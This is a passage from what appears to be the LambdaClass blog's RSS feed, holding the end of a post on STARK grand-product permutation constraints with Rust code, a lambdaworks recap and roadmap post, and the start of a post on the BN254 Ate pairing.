&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$a$&lt;&#x2F;th&gt;&lt;th&gt;$v$&lt;&#x2F;th&gt;&lt;th&gt;$a’$&lt;&#x2F;th&gt;&lt;th&gt;$v’$&lt;&#x2F;th&gt;&lt;th&gt;$p$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;7&lt;&#x2F;td&gt;&lt;td&gt;$\frac {z - (2 + \alpha 10)} {z - (0 + \alpha 7)}$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;7&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;7&lt;&#x2F;td&gt;&lt;td&gt;$\frac {z - (2 + \alpha 10)} {z - (0 + \alpha 7)} \cdot \frac {z - (0 + \alpha 7)} {z - (0 + \alpha 7)}$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;7&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;20&lt;&#x2F;td&gt;&lt;td&gt;$\frac {z - (2 + \alpha 10)} {z - (0 + \alpha 7)} \cdot \frac {z - (0 + \alpha 7)} {z - (0 + \alpha 7)} \cdot \frac {z - (0 + \alpha 7)} {z - (1 + \alpha 20)}$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;20&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;td&gt;$\frac {z - (2 + \alpha 10)} {z - (0 + \alpha 7)} \cdot \frac {z - (0 + \alpha 7)} {z - (0 + \alpha 7)} \cdot \frac {z - (0 + \alpha 7)} {z - (1 + \alpha 20)} \cdot \frac {z - (1 + \alpha 20)} {z - (2 + \alpha 10)}$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;Looking at the example, observe that the last value in column $p$ is the product of all the previous ratios. Since the sorted columns are indeed a permutation, each factor in the numerators (coming from $a$ and $v$) appears exactly once among the denominators (coming from $a’$ and $v’$), so everything cancels and the entire product equals $1$. For instance, in the table above, the first numerator (orange) cancels with the last denominator (orange):&lt;&#x2F;p&gt;
&lt;p&gt;$$\frac { {\style{color: orange} {z - (2 + \alpha 10)}}} {\style{color: cyan} {z - (0 + \alpha 7)}} \cdot \frac { \style{color: magenta} {z - (0 + \alpha 7)}} { \style{color: magenta} {z - (0 + \alpha 7)}} \cdot \frac { \style{color: cyan} {z - (0 + \alpha 7)}} { \style{color: lime} {z - (1 + \alpha 20)}} \cdot \frac { \style{color: lime} {z - (1 + \alpha 20)}} { \style{color: orange} {z - (2 + \alpha 10)}} = 1$$&lt;&#x2F;p&gt;
&lt;p&gt;Generalizing to any trace with $n$ rows, the last value, called the &lt;em&gt;Grand Product&lt;&#x2F;em&gt;, is:&lt;&#x2F;p&gt;
&lt;p&gt;$$p_{n - 1} = \frac {z - (a_0 + \alpha v_0)} {z - (a_0^\prime + \alpha v_0^\prime )} \cdot \frac {z - (a_1 + \alpha v_1)} {z - (a_1^\prime + \alpha v_1^\prime )} \ldots \frac {z - (a_{n - 1} + \alpha v_{n - 1})} {z - (a_{n - 1}^\prime + \alpha v_{ n - 1 }^\prime )}$$&lt;&#x2F;p&gt;
&lt;p&gt;Then, using the randomness of $z$ and $\alpha$ (and the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Schwartz%E2%80%93Zippel_lemma&quot;&gt;Schwartz–Zippel Lemma&lt;&#x2F;a&gt;), we know that to prove that $a’$ and $v’$ are a permutation of $a$ and $v$, it suffices to check that:&lt;br &#x2F;&gt;
$$ p_{n-1} = 1$$&lt;&#x2F;p&gt;
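The cancellation argument can be checked numerically. The following self-contained sketch uses a toy 64-bit prime field instead of the field types used in the post (all helper names are ours), builds the grand product for the example table, and confirms it equals 1:

```rust
const P: u64 = 1_000_000_007; // toy prime; real provers use much larger fields

fn mul(a: u64, b: u64) -> u64 { ((a as u128 * b as u128) % P as u128) as u64 }
fn sub(a: u64, b: u64) -> u64 { (a + P - b % P) % P }
fn pow(mut b: u64, mut e: u64) -> u64 {
    let mut r = 1;
    while e > 0 { if e & 1 == 1 { r = mul(r, b); } b = mul(b, b); e >>= 1; }
    r
}
// Modular inverse via Fermat's little theorem: a^(P-2) mod P.
fn inv(a: u64) -> u64 { pow(a, P - 2) }

// Grand product p_{n-1} = prod_i (z - (a_i + alpha*v_i)) / (z - (a'_i + alpha*v'_i)).
// If (a', v') is a permutation of (a, v), every factor cancels and the result is 1.
fn grand_product(a: &[u64], v: &[u64], a_s: &[u64], v_s: &[u64], z: u64, alpha: u64) -> u64 {
    let mut p = 1;
    for i in 0..a.len() {
        let num = sub(z, (a[i] + mul(alpha, v[i])) % P);
        let den = sub(z, (a_s[i] + mul(alpha, v_s[i])) % P);
        p = mul(p, mul(num, inv(den)));
    }
    p
}

fn main() {
    // The example table from the post: (a', v') is the sorted permutation of (a, v).
    let (a, v) = ([2, 0, 0, 1], [10, 7, 7, 20]);
    let (a_s, v_s) = ([0, 0, 1, 2], [7, 7, 20, 10]);
    // Arbitrary stand-ins for the verifier's random challenges.
    let (z, alpha) = (123_456_789, 987_654_321);
    assert_eq!(grand_product(&a, &v, &a_s, &v_s, z, alpha), 1);
    println!("grand product equals 1");
}
```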
&lt;p&gt;In this way, the constraints that guarantee the correct permutation are reduced to two boundary constraints and one transition constraint (you can find them in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2021&#x2F;1063.pdf&quot;&gt;Cairo Paper&lt;&#x2F;a&gt;, Section 9.7.2):&lt;&#x2F;p&gt;
&lt;h4 id=&quot;1-initial-value-boundary-constraint&quot;&gt;1. Initial Value Boundary Constraint:&lt;&#x2F;h4&gt;
&lt;p&gt;$$p_0 = \frac {z - (a_0 + \alpha v_0)} {z - (a_0^\prime + \alpha v_0^\prime )}$$ We check that the first value in the auxiliary column is correct.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;2-final-value-boundary-constraint&quot;&gt;2. Final Value Boundary Constraint:&lt;&#x2F;h4&gt;
&lt;p&gt;$$p_{n - 1} = 1$$ We check that the Grand Product equals 1.&lt;&#x2F;p&gt;
&lt;p&gt;In our code, these two Boundary Constraints are located in the &lt;code&gt;boundary_constraints()&lt;&#x2F;code&gt; function of the &lt;code&gt;AIR&lt;&#x2F;code&gt; implementation for &lt;code&gt;ReadOnlyRAP&amp;lt;F&amp;gt;&lt;&#x2F;code&gt;. You can see them below, after the comment &lt;code&gt;&#x2F;&#x2F;Auxiliary boundary constraints&lt;&#x2F;code&gt;:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn boundary_constraints(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;self,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    rap_challenges: &amp;amp;[FieldElement&amp;lt;Self::FieldExtension&amp;gt;],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; BoundaryConstraints&amp;lt;Self::FieldExtension&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let a0 = &amp;amp;self.pub_inputs.a0;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let v0 = &amp;amp;self.pub_inputs.v0;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let a_sorted0 = &amp;amp;self.pub_inputs.a_sorted0;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let v_sorted0 = &amp;amp;self.pub_inputs.v_sorted0;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let z = &amp;amp;rap_challenges[0];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let alpha = &amp;amp;rap_challenges[1];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Main boundary constraints&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let c1 = BoundaryConstraint::new_main(0, 0, a0.clone());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let c2 = BoundaryConstraint::new_main(1, 0, v0.clone());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let c3 = BoundaryConstraint::new_main(2, 0, a_sorted0.clone());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let c4 = BoundaryConstraint::new_main(3, 0, v_sorted0.clone());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Auxiliary boundary constraints&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let num = z - (a0 + alpha * v0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let den = z - (a_sorted0 + alpha * v_sorted0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let p0_value = num &#x2F; den;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let c_aux1 = BoundaryConstraint::new_aux(0, 0, p0_value);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let c_aux2 = BoundaryConstraint::new_aux(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        0,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        self.trace_length - 1,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        FieldElement::&amp;lt;Self::FieldExtension&amp;gt;::one(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    BoundaryConstraints::from_constraints(vec![c1, c2, c3, c4, c_aux1, c_aux2])&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Note that the verifier must also know the values of $a$, $v$, $a’$, $v’$ in the first row of the trace to check the Initial Value constraint. This is a problem we did not have before, since the verifier only has access to the commitment of the trace, not its elements (the other constraints do not reference specific trace values). Therefore, this first row must be part of the public input.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;3-permutation-transition-constraint&quot;&gt;3. Permutation Transition Constraint:&lt;&#x2F;h4&gt;
&lt;p&gt;$$(z - (a_{i+1}^\prime + \alpha v_{i + 1}^\prime )) \cdot p_{i+1} - (z - (a_{i+1} + \alpha v_{i+1})) \cdot p_i = 0$$ for all $i \in {0, \ldots, n-2}$.&lt;&#x2F;p&gt;
&lt;p&gt;In this way, we check that each element of $p$ was constructed correctly, with the last element being the Grand Product. In our code, we call this transition constraint &lt;code&gt;PermutationConstraint&lt;&#x2F;code&gt;. The use of this equation can be seen in its &lt;code&gt;evaluate()&lt;&#x2F;code&gt; function:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn evaluate(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;self,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    frame: &amp;amp;Frame&amp;lt;F, F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transition_evaluations: &amp;amp;mut [FieldElement&amp;lt;F&amp;gt;],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    _periodic_values: &amp;amp;[FieldElement&amp;lt;F&amp;gt;],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    rap_challenges: &amp;amp;[FieldElement&amp;lt;F&amp;gt;],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let first_step = frame.get_evaluation_step(0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let second_step = frame.get_evaluation_step(1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let p0 = first_step.get_aux_evaluation_element(0, 0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let p1 = second_step.get_aux_evaluation_element(0, 0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let z = &amp;amp;rap_challenges[0];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let alpha = &amp;amp;rap_challenges[1];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let a1 = second_step.get_main_evaluation_element(0, 0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let v1 = second_step.get_main_evaluation_element(0, 1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let a_sorted_1 = second_step.get_main_evaluation_element(0, 2);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let v_sorted_1 = second_step.get_main_evaluation_element(0, 3);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let res = (z - (a_sorted_1 + alpha * v_sorted_1)) * p1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        - (z - (a1 + alpha * v1)) * p0;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transition_evaluations[self.constraint_idx()] = res;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;By introducing sorted columns and auxiliary columns, we reduce the problem of validating a continuous read-only memory to proving three simpler constraints:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Continuity&lt;&#x2F;strong&gt;: all memory addresses form a contiguous range.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Single-Value&lt;&#x2F;strong&gt;: each address always holds the same value.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Permutation&lt;&#x2F;strong&gt;: the sorted columns are a permutation of the original columns.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;These constraints show how naturally STARKs encode complex relationships as simple polynomial equations.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>lambdaworks - recap and updated roadmap</title>
          <pubDate>Tue, 24 Sep 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/lambdaworks-recap-and-updated-roadmap/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/lambdaworks-recap-and-updated-roadmap/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/lambdaworks-recap-and-updated-roadmap/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;It has been over a year and a half since we launched &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&quot;&gt;lambdaworks&lt;&#x2F;a&gt;, our cryptography library for zero-knowledge (ZK) proofs. We built it focusing on performance, ease of use, support for hardware acceleration, and teaching others how to develop and understand ZK.&lt;&#x2F;p&gt;
&lt;p&gt;Several advances in ZK over the last year have offered incredible performance gains over previous schemes. For example, Circle STARKs have made it possible to prove over &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;x.com&#x2F;StarkWareLtd&#x2F;status&#x2F;1807776563188162562&quot;&gt;620k Poseidon2 hashes per second on consumer-end hardware&lt;&#x2F;a&gt;. Binius lets us leverage the power of binary fields, and its performance can be greatly increased with specialized hardware. We have seen new lookup arguments whose cost depends only on the number of lookups used, as well as more efficient hash functions. Last year also saw the development and release of general-purpose zero-knowledge virtual machines (zkVMs), which let us write ordinary code (for example, in Rust), execute it on top of the virtual machine, and generate a proof of the execution. This simplifies the development of verifiable applications by abstracting the low-level details of ZK away from developers. With the introduction of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.alignedlayer.com&#x2F;&quot;&gt;Aligned&lt;&#x2F;a&gt;, we expect proof verification costs to go down consistently, enabling new verifiable applications built on top of Ethereum. ZK will likely become more and more important in the coming years, so it is essential to have many of these tools in our library.&lt;&#x2F;p&gt;
&lt;p&gt;Before jumping into the future, let us recap some of the features and numbers of lambdaworks:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;493 pull requests merged.&lt;&#x2F;li&gt;
&lt;li&gt;73 contributors.&lt;&#x2F;li&gt;
&lt;li&gt;14 releases.&lt;&#x2F;li&gt;
&lt;li&gt;Over 185k downloads.&lt;&#x2F;li&gt;
&lt;li&gt;4 proof systems (STARKs, Cairo, Groth16, Plonk) and two additional example implementations (Pinocchio and BabySNARK).&lt;&#x2F;li&gt;
&lt;li&gt;2 editions of the Sparkling Water Bootcamp in Cryptography, with 30 bootcampers from different countries.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;tree&#x2F;main&#x2F;math&#x2F;src&#x2F;field&quot;&gt;Backend for finite fields&lt;&#x2F;a&gt; using Montgomery arithmetic, plus specialized backends for fields with simpler reduction formulae.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;tree&#x2F;main&#x2F;math&#x2F;src&#x2F;elliptic_curve&quot;&gt;Backend for elliptic curve operations&lt;&#x2F;a&gt;, with different coordinate systems.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;tree&#x2F;main&#x2F;math&#x2F;src&#x2F;polynomial&quot;&gt;Backend for univariate polynomials&lt;&#x2F;a&gt; and Fast Fourier Transform (FFT).&lt;&#x2F;li&gt;
&lt;li&gt;Several cryptographic tools, such as hash functions (Poseidon and Pedersen), Merkle trees, KZG commitments, and the Fiat-Shamir transformation.&lt;&#x2F;li&gt;
&lt;li&gt;Examples and exercises.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Considering all the recent advances and trends, as well as the feedback we have received from users and friends, we will incorporate new features and improve existing ones according to the following roadmap.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;roadmap&quot;&gt;Roadmap&lt;&#x2F;h2&gt;
&lt;p&gt;The following is a list of features and updates we want to incorporate into lambdaworks. We may change some or include new ones according to the latest developments in ZK technology:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Improve field backends using assembly.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Improve field extension backends.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Provide a new backend implementation for Mersenne primes.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Incorporate binary fields.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Improve and add features on multilinear and multivariate polynomials.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Improve the performance of BLS12-381 and BLS12-377 pairings.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Add new hash functions: Rescue, [XHash8 and XHash12](https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;1045.pdf), Poseidon 2.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Add [logUp with GKR](https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;1284).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Add [Binius](https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;1784).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Add [Circle STARKs](https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2024&#x2F;278).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Provide tools for efficient proof recursion.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Provide more documentation, examples, use cases, etc.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Add more theoretical background to the library.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Finish integration with [Icicle](https:&#x2F;&#x2F;github.com&#x2F;ingonyama-zk&#x2F;icicle).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Add bindings for Python and other programming languages.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;Over the last year and a half, we have seen many new developments in ZK, improving the performance of proof systems while greatly simplifying the development of verifiable applications. The introduction of ZK verification layers will lead to lower verification costs and new applications.&lt;&#x2F;p&gt;
&lt;p&gt;lambdaworks has incorporated many proof systems and different cryptographic primitives to help developers build applications and understand how things work under the hood. We present the new roadmap for the library, hoping to incorporate new proof systems, such as Circle STARKs and Binius, while maintaining simplicity and providing clear and straightforward documentation. That way, we hope to bring ZK to developers worldwide, helping them adopt this transformative technology and make it available to everybody.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>How we implemented the BN254 Ate pairing in lambdaworks</title>
          <pubDate>Tue, 20 Aug 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/how-we-implemented-the-bn254-ate-pairing-in-lambdaworks/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/how-we-implemented-the-bn254-ate-pairing-in-lambdaworks/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/how-we-implemented-the-bn254-ate-pairing-in-lambdaworks/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;The elliptic curve BN254 is currently the only curve with precompiled contracts on Ethereum, making it the most practical choice of a pairing-friendly curve suitable for on-chain &lt;a href=&quot;&#x2F;pinocchio-verifiable-computation-revisited&#x2F;&quot;&gt;zk-SNARK&lt;&#x2F;a&gt; verification with proof systems such as &lt;a href=&quot;&#x2F;groth16&#x2F;&quot;&gt;Groth16&lt;&#x2F;a&gt; and &lt;a href=&quot;&#x2F;all-you-wanted-to-know-about-plonk&#x2F;&quot;&gt;PlonK&lt;&#x2F;a&gt;. This work arises from the need to have our &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;blob&#x2F;main&#x2F;math&#x2F;src&#x2F;elliptic_curve&#x2F;short_weierstrass&#x2F;curves&#x2F;bn_254&#x2F;pairing.rs&quot;&gt;own implementation of the BN254 Ate pairing&lt;&#x2F;a&gt;. The idea of this post is to serve as a companion for our implementation, explaining the mathematical theory and algorithms needed to understand it. Several papers and articles present different algorithms for this pairing and its functions, so we thought organizing all that information into a single post would be helpful.&lt;&#x2F;p&gt;
&lt;p&gt;Regarding the mathematical background necessary to follow this reading, we only assume a slight notion of Groups, Finite Fields, and Elliptic Curves. If you do not feel confident in those topics we recommend reading our posts &lt;a href=&quot;&#x2F;math-survival-kit-for-developers&#x2F;&quot;&gt;Math Survival Kit for Developers&lt;&#x2F;a&gt; and &lt;a href=&quot;&#x2F;what-every-developer-needs-to-know-about-elliptic-curves&#x2F;&quot;&gt;What Every Developer Needs to Know About Elliptic Curves&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;curve-parameters&quot;&gt;Curve Parameters&lt;&#x2F;h2&gt;
&lt;p&gt;BN254 (&lt;code&gt;BN254Curve&lt;&#x2F;code&gt; in lambdaworks) is the Barreto-Naehrig pairing-friendly elliptic curve $E$ of the form&lt;br &#x2F;&gt;
$$y^2 = x^3 + 3$$&lt;br &#x2F;&gt;
over a finite field $\mathbb{F_p}$ where:&lt;&#x2F;p&gt;
